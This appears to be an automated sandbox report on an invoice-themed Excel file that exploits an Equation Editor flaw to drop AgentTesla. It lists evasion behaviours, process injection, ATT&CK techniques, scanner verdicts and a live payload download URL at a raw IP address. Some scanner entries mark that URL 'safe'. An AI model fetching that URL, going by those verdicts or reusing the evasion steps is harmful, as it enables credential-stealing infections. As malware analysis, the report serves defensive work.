                Source: vbc.exe.4.dr, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: vbc.exe.4.dr, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: vbc.exe.4.dr, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: vbc.exe.4.dr, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: vbc.exe.4.dr, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: vbc.exe.4.dr, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: vbc.exe.4.dr, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: vbc.exe.4.dr, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: vbc.exe.4.dr, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: vbc.exe.4.dr, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: vbc.exe.4.dr, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: vbc.exe.4.dr, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: vbc.exe.4.dr, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: 6.0.vbc.exe.ec0000.0.unpack, XC8LQ7SRtLdGVTj875/RSm6LshekR3eiKnl2d.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'BCpK0qHUG6', 'AbOK6vXIcg', 'QoJKB4Rw0e', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'OZ4KTFK59K'
                Source: 6.0.vbc.exe.ec0000.0.unpack, gpprQs1JTfKY43huFu/FX6iCHA7LM8aIR8xSD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'AinK8bq2yu', 'zUKmlCri3a', 'Bgpmwss4W8', 'HmjmupSYqs', 'c59mOLHwKl', 'H4gmVXsG3m', 'CkpmbC96WM', 'oNam6TVq6p'
                Source: 6.0.vbc.exe.ec0000.0.unpack, yyI5uhmlZql1NXDJdB/ijoMm5rxdPnqdfLa2F.csHigh entropy of concatenated method names: 'NJYoeUuyln', 'sdQo9JjuCk', 'mQqoGYusu5', 'a6towU9NfQ', 'j96oB2V5CW', 'zrho2ehmSP', 'igIo4t7X4l', 'Hfhoqn1LKo', 'XPEotfFa3E', 'nyEolE546H'
                Source: 6.0.vbc.exe.ec0000.0.unpack, sIiWtTsZOy3ymXKnDM/JLLJRtUXaCaWrPg6HW.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'h9kdMWng5s', 'lhkQNO1OVB', 'DWdQLT5a9Q', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU', 'FtlKH8pZ47', 'We5vvBDwjk'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Qu6SICHw3A4mPVjAWP/jhR0vSPbuV7axYFEin.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'eDnd8BQBBZ', 'oejdQlRVXK', 'jlmdjD3r74', 't3fdX1CHfH', 'iFAd4uSimN', 'kgtK9SQUUD', 'y06KC2fty7', 'bOAKX1wTYU'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Jawtflp0qcAQxEfLDu/mRmUotNwtL1tX0xfpi.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'Y3vOvekntU', 'uURvT8k6iY', 'UqDvzkHbQZ', 'jEkQg7jO4O', 'ICAQer9Nm0', 'af9QyZ0r7u', 'FqpQ06hfRQ', 'CQTQYL6yeT'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Nn8lq6qXoiQOmnkFjd/ph3i2r2ZpugBVdcTRF.csHigh entropy of concatenated method names: 'RJT5rfKY43', 'LuF5musSm6', 'dnl532d7C8', 'tQ75CRtLdG', 'BUo5utwtL1', 'lX05RxfpiJ', 'awt5Ifl0qc', 'KQx5EEfLDu', 'c7a5JxYFEi', 'pHu5A6SICw'
                Source: 6.0.vbc.exe.ec0000.0.unpack, YAE3O3JXw2wpfdXcfJ/LlJn3uZpU8RWafXNOV.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'EEhmpNBWOF', 'mQfm2X2uUR', 'lTWmZeuBxU', 'B6SmWTrawQ', 'muEmPau0s8', 'DJJmnK1SHX', 'RnEmsb7cLj', 'GtPmaaH5iO'
                Source: 6.0.vbc.exe.ec0000.0.unpack, YlSuYQRHSxRhPJwg0s/EL5ZuhuBsUedVLCe47.csHigh entropy of concatenated method names: 's8qVZbC8tq', 'WgyVJmgmfp', 'ed6V1VSdb8', 'mvtVhM7Zba', 'uWmVN7gS2R', 'Fq2VpoJp8p', 'PcpVPa6D4N', 'dClVHbN2io', 'cMOVskAh69', 'ckYVfZmUOk'
                Source: 6.0.vbc.exe.ec0000.0.unpack, SxKsVSxgYTkLHj6moq/RCTRmO0H9b1QtgnJmO.csHigh entropy of concatenated method names: 'E62cmi1mr2', 'zk6cu701cO', 'hkfcRu6tGh', '.ctor', '.ctor', 'YHZcYLZHOd', 'tsXc3aHNDv', 'OffcCVf2R9', 'owMcMYdHmV', 'WEQahG1D4mkQl6JHEL2'
                Source: 6.0.vbc.exe.ec0000.0.unpack, obWUh6Cb9BqRvavWXw/lOTTtm3pgdvAnULHLr.csHigh entropy of concatenated method names: 'w1xVgN0Jsy', 'dKmVWLdg6f', 'LCdV6EPlXj', 'ciXVnI2Mdm', 'EfBVe3gYLM', 'dCtV9Exve3', 'MGqVLVJrk9', 'WYaVGTgx9V', 'GtiVwhnFLW', 'dlFVT6RCdy'
                Source: 6.0.vbc.exe.ec0000.0.unpack, q1IUAUDwsWbplMEoQF/HsN3gxfes6Rv157qSv.csHigh entropy of concatenated method names: '.ctor', 'Tnhc5Ut6V9', 'O0ocoWEmfr', 'loCcVYeBVS', 'kj4cKMhw1w', 'ejqcOV6i0e', 'pvrcdUqJfo', 'SY6dRvIzG297TILfElI', 'jLhcHH1o0iKvI3qO4OA', 'pORp8VIiNhnGUL8R3XA'
                Source: 6.0.vbc.exe.ec0000.0.unpack, XPEfFa5V3Es49PEcfY5/bNPoP65oL7XjgIt7X4l.csHigh entropy of concatenated method names: '.ctor', 'q8tcf8mQYy', 'KENcDogZaD', 'oUFcvURfc4', 'J2WcFbEkWn', 'CuUc0wmapc', 'xFScxAenFI', 'z49c70yUiS', 'iMCcbUOx4l', 'ueTczCI0Om'
                Source: 6.0.vbc.exe.ec0000.0.unpack, Toc3gZ55Ds3ykoTkkT4/A0PiG55aXVGg1GhxwAg.csHigh entropy of concatenated method names: 'Dispose', 'Es2cSPvwhn', 'IoHcNfRLkU', 'GrgcpiH89b', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'aJtoyu1dUBYUqHoSHQY', 'kGjBTe1Yfd5fFFj0Hle'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: FACTURA 3879843.xlsxStream path 'EncryptedPackage' entropy: 7.9986477778 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9658Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2168Thread sleep time: -39208s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 1260Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2256Thread sleep time: -360000s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2108Thread sleep count: 9658 > 30Jump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2108Thread sleep count: 74 > 30Jump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep count: 98 > 30Jump to behavior
                Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\Public\vbc.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 39208Jump to behavior
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000Jump to behavior
                Source: vbc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
                Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000007.00000002.2364238263.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1772, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading111OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information11Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                FACTURA 3879843.xlsx30%VirustotalBrowse
                FACTURA 3879843.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe100%Joe Sandbox ML
                C:\Users\Public\vbc.exe100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                7.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pcLwYQ.com0%Avira URL Cloudsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://198.12.91.148/oso.exe9%VirustotalBrowse
                http://198.12.91.148/oso.exe0%Avira URL Cloudsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.12.91.148/oso.exetrue
                • 9%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries
